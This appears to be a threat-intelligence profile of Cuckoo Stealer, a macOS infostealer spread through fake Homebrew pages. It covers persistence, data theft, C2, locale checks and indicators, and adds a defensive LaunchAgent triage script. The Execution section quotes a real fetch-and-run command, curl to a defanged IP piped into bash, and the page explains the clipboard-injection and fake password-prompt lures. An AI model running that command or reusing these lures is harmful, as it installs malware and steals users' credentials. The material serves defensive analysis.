Cuckoo Stealer
Cuckoo Stealer is a macOS infostealer, and in some reporting a stealer/RAT, delivered in social-engineering campaigns that impersonate legitimate software installation workflows, particularly fake Homebrew pages and ClickFix-style lures. Reported campaigns used typosquatted Homebrew infrastructure such as homabrews[.]org and counterfeit Homebrew pages to trick users into copying and executing malicious Terminal commands. Hunt.io described a chain in which a credential-harvesting loader repeatedly prompts for the user’s password, validates it locally with dscl . -authonly, then downloads a second-stage Cuckoo Stealer binary. Researchers Alden Schmidt and Intego also documented Cuckoo Stealer pivoting to fake Homebrew pages, with operators leveraging this method in Homebrew malvertising campaigns between May 2024 and January 2025.
On execution, Cuckoo Stealer can remove macOS quarantine attributes with xattr to suppress Gatekeeper warnings, copy and rename itself as DumpMediaSpotifyMusicConverter, and establish persistence via LaunchAgents that repeatedly execute the payload. One reported persistence artifact is com.homebrew.brewupdater.plist, with the malware copying its binary to a hidden directory under ~/.local-{session_id}/ as BrewUpdater. Reporting also associates Cuckoo Stealer with LoginHook-style persistence in macOS-focused persistence research.
Its collection behavior includes staging data from Safari, Notes, and Keychain to /var/folder, collecting Safari bookmarks, cookies, and browsing history, searching systems for installed applications, and sending host information and stolen data to command-and-control infrastructure, including captured passwords, OS build, hostname, and username. Additional reporting states it targets browser credentials, session tokens, Keychain data, Apple Notes, Discord and Telegram sessions, VPN/FTP configurations, Steam data, and data from more than 20 cryptocurrency wallet applications.
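As an added defender's example (not from the page or any vendor's tooling), the following Python triage checks a LaunchAgent plist for the persistence artifacts described above: the reported label com.homebrew.brewupdater, a binary staged under a hidden ~/.local-* directory as BrewUpdater, and a configuration that relaunches the payload repeatedly. Both sample plists are constructed mock-ups, and the benign label com.example.backup is an assumption.

```python
"""Triage LaunchAgent plists for the persistence pattern reported above.
The plists below are constructed mock-ups built only from the reported artifact
names (com.homebrew.brewupdater, ~/.local-<id>/BrewUpdater); not real samples."""
import plistlib
import re
from xml.parsers.expat import ExpatError

# Reported label and hidden-directory layout; everything else flagged is heuristic.
REPORTED_LABELS = {"com.homebrew.brewupdater"}
HIDDEN_LOCAL_DIR = re.compile(r"/\.local-[^/]+/BrewUpdater$")


def triage_launch_agent(plist_bytes: bytes) -> list[str]:
    """Return findings for one LaunchAgent plist; an empty list means nothing matched."""
    try:
        data = plistlib.loads(plist_bytes)
    except (plistlib.InvalidFileException, ExpatError, ValueError):
        return ["unparseable plist"]
    findings = []
    label = str(data.get("Label", ""))
    if label.lower() in REPORTED_LABELS:
        findings.append(f"label matches reported artifact: {label}")
    args = data.get("ProgramArguments") or []
    program = str(data.get("Program") or (args[0] if args else ""))
    if HIDDEN_LOCAL_DIR.search(program):
        findings.append(f"binary staged in hidden ~/.local-* directory: {program}")
    elif "/." in program:  # any dot-directory in the path deserves a look
        findings.append(f"binary lives in a hidden directory: {program}")
    # RunAtLoad plus KeepAlive/StartInterval is what makes launchd re-run the payload.
    if data.get("RunAtLoad") and (data.get("KeepAlive") or data.get("StartInterval")):
        findings.append("relaunches repeatedly (RunAtLoad with KeepAlive/StartInterval)")
    return findings


# Constructed samples: one modelled on the reported artifact, one benign control.
SUSPECT = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.homebrew.brewupdater</string>
  <key>ProgramArguments</key><array><string>/Users/alice/.local-1234/BrewUpdater</string></array>
  <key>RunAtLoad</key><true/><key>KeepAlive</key><true/>
</dict></plist>"""
BENIGN = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.backup</string>
  <key>ProgramArguments</key><array><string>/usr/local/bin/backup</string></array>
  <key>RunAtLoad</key><true/>
</dict></plist>"""

if __name__ == "__main__":
    for finding in triage_launch_agent(SUSPECT):
        print(finding)
```

To sweep a live host, feed each file from ~/Library/LaunchAgents and /Library/LaunchAgents through triage_launch_agent and review any non-empty result.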
For credential theft, Cuckoo Stealer can display a GUI prompt claiming that macOS needs to access System Settings in order to capture passwords. For command and control, it can use sockets and encrypted HTTPS communications; one report describes HTTPS C2 using X25519 ECDH key exchange, libcurl, and additional XOR/MD5-derived encryption. Reported RAT-style capabilities include executing shell commands with or without output, rebooting the host, self-destruct, starting or stopping exfiltration, and exfiltrating specific files.
Cuckoo Stealer also performs locale-based filtering. It checks the LANG environment variable and avoids infecting systems configured for Armenia (hy_AM), Belarus (be_BY), Kazakhstan (kk_KZ), Russia (ru_RU), and Ukraine (uk_UA), using language settings to infer victim geography. High-confidence infrastructure and delivery indicators mentioned in the content include homabrews[.]org, raw.homabrews[.]org, brewsh[.]cx, brrewsh[.]org, brewshh[.]org, and IP address 5.255.123[.]244.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Techniques & procedures
35 distinct techniques documented for this family, organized by ATT&CK tactic.
Reconnaissance
1 technique
Volt Typhoon has obtained the victim's system current location.
Initial Access
2 techniques
Victims are directed to high-fidelity, deceptive web interfaces that simulate legitimate services.
Iru Threat Intelligence has seen a recent increase in attackers using spoofed Homebrew webpages to get users to download malware.
Execution
4 techniques
Initial commands leverage curl to fetch obfuscated payloads, which are piped directly into shell interpreters (bash/zsh), minimizing the disk footprint.
ClickFix variant that uses the applescript:// URL scheme to invoke the macOS Script Editor... This URL-encoded hyperlink runs a dual-track routine... while silently executing the curl command in the background to deliver an infostealer, bypassing Gatekeeper via user-coerced interaction.
before we published the post, it was updated to include a malicious, base64-encoded cURL payload... Command curl -s http://185[.]93[.]89[.]62/d/vipx69930 | nohup bash &
Attackers exploit this trust by providing malicious command strings that mimic legitimate installation procedures.
Persistence
2 techniques
Long-term access is secured via LaunchAgents and .plist files, often masquerading as legitimate system or software updaters.
Privilege Escalation
2 techniques
Long-term access is secured via LaunchAgents and .plist files, often masquerading as legitimate system or software updaters.
Stealth
5 techniques
The content repeatedly describes payloads, strings, configuration files, scripts, URLs, and binaries being obfuscated or encoded using Base64, XOR, RC4, AES, RSA, hex encoding, custom algorithms, and other methods across many malware families and threat actors.
Long-term access is secured via LaunchAgents and .plist files, often masquerading as legitimate system or software updaters.
The content repeatedly describes malware and threat actors decoding, decrypting, or deobfuscating payloads, strings, configuration data, commands, and C2 traffic prior to execution or use, e.g., 'APT28 macro uses the command certutil -decode to decode contents of a .txt file storing the base64 encoded payload' and 'Action RAT can use Base64 to decode actor-controlled C2 server communications.'
Defense Impairment
1 technique
Credential Access
6 techniques
Bundlore prompts the user for their credentials. Calisto presents an input prompt asking for the user's login and password. Cuckoo Stealer has captured passwords by prompting victims with a "macOS needs to access System Settings" GUI window. Dok prompts the user for credentials. FIN4 has presented victims with spoofed Windows Authentication prompts to collect their credentials. iKitten prompts the user for their credentials. Keydnap prompts the users for credentials. Proton prompts users for their credentials. RedCurl prompts the user for credentials through a Microsoft Outlook pop-up. SILENTTRINITY's credphisher.py module can prompt a current user for their credentials. XCSSET prompts the user to input credentials using a native macOS dialog box leveraging the system process /Applications/Safari.app/Contents/MacOS/SafariForWebKitDevelopment.
Exfiltration efforts focus on high-value data, including browser credentials (Chromium/Firefox), macOS Keychains, and messaging session tokens (Telegram/Discord).
Subsequent stages often involve a native-looking password prompt to facilitate credential harvesting under the guise of installation continuity.
Discovery
8 techniques
The content repeatedly describes malware and threat actors collecting usernames, identifying logged-in users, running whoami/query user/quser, checking admin status, and enumerating user sessions.
The content repeatedly describes malware and threat actors obtaining lists of running processes, using utilities such as tasklist, ps, WMI, Get-Process, CreateToolhelp32Snapshot, EnumProcesses, and similar APIs/commands to enumerate active processes on victim systems.
The content repeatedly describes malware and threat actors collecting host details such as OS version, hostname, architecture, CPU, memory, BIOS, domain, language, and other configuration data; e.g., "APT41 uses multiple built-in commands such as systeminfo and net config Workstation to enumerate victim system basic configuration information."
APT38 has collected browser bookmark information to learn more about compromised hosts, obtain personal information about users, and acquire details about internal network resources.
DarkGate queries system locale information during execution. Later versions of DarkGate query GetSystemDefaultLCID for locale information to determine if the malware is executing in Russian-speaking countries.
"Bazar can query the Registry for installed applications." / "BRONZE BUTLER has used tools to enumerate software installed on an infected host." / "LightSpy ... enumerate the Applications folder to collect the bundle name, bundle identifier, and version information..." / "Volt Typhoon has queried the Registry on compromised systems for information on installed software."
"Amadey does not run any tasks or install additional malware if the victim machine is based in Russia"; "DarkGate queries system locale information... determine if the malware is executing in Russian-speaking countries"; "Ragnar Locker checks... GetLocaleInfoW and doesn't encrypt files if it finds a former Soviet country"; "Saint Bot has conducted system locale checks..."
Avaddon checks for specific keyboard layouts and OS languages to avoid targeting Commonwealth of Independent States (CIS) entities... Bazar can perform a check to ensure that the operating system's keyboard and language settings are not set to Russian... Clop has checked the keyboard language using the GetKeyboardLayout() function... Ryuk has been observed to query the registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Nls\Language and the value InstallLanguage.
Collection
3 techniques
Bundlore prompts the user for their credentials. Calisto presents an input prompt asking for the user's login and password. Cuckoo Stealer has captured passwords by prompting victims with a "macOS needs to access System Settings" GUI window. Dok prompts the user for credentials. FIN4 has presented victims with spoofed Windows Authentication prompts to collect their credentials. iKitten prompts the user for their credentials. Keydnap prompts the users for credentials. Proton prompts users for their credentials. RedCurl prompts the user for credentials through a Microsoft Outlook pop-up. SILENTTRINITY's credphisher.py module can prompt a current user for their credentials. XCSSET prompts the user to input credentials using a native macOS dialog box leveraging the system process /Applications/Safari.app/Contents/MacOS/SafariForWebKitDevelopment.
The content repeatedly describes adversaries and malware storing collected data, command output, credentials, archives, or files in local temporary folders, working directories, hidden directories, registry locations, recycle bins, or specific files prior to exfiltration.
Rather than allowing users to highlight and copy the install command, the page forces them to use a single Copy button. That restriction is purposeful: it enables the attacker to inject an extra hidden command into the clipboard, outside of what is shown to the user on the webpage, which downloads a malicious payload in parallel with the Homebrew installer.
Command and Control
3 techniques
The content repeatedly describes threat actors, malware, and campaigns using HTTP and/or HTTPS for command and control, including examples such as BlackEnergy communicating with C2 over HTTP POST requests and many other families using HTTP/S for C2.
Initial commands leverage curl to fetch obfuscated payloads
Exfiltration
1 technique
ADVSTORESHELL exfiltrates data over the same channel used for C2... Agrius exfiltrated staged data using tools such as Putty and WinSCP, communicating with command and control servers... numerous malware and groups sent victim data, files, credentials, or host information over existing C2 channels.
Other
1 technique
IOCs tracked for this family
1 indicator attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
Recent activity
22 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A macOS infostealer used in ClickFix campaigns to exfiltrate sensitive user data from compromised systems.
Information stealer delivered via fake Homebrew pages that mimic the official install flow to trick users into installing malicious commands, enabling secret exfiltration and possible persistent access.
macOS infostealer/RAT delivered via typosquatted Homebrew-themed ClickFix lures; establishes LaunchAgent persistence, removes quarantine attributes, uses encrypted HTTPS C2, and steals browser credentials/session tokens, Keychain data, notes/messaging sessions, VPN/FTP configs, and data from numerous crypto wallet apps.
Second-stage macOS infostealer/RAT delivered via a ClickFix/Homebrew-typosquat paste-and-run command. Establishes LaunchAgent persistence, removes quarantine attributes, uses encrypted HTTPS C2 (X25519 ECDH-derived), supports remote command execution and file exfiltration, and steals high-value data including browser credentials/cookies, Keychain, Apple Notes, Discord/Telegram sessions, VPN/FTP configs, Steam sessions, and data from 20+ cryptocurrency wallets.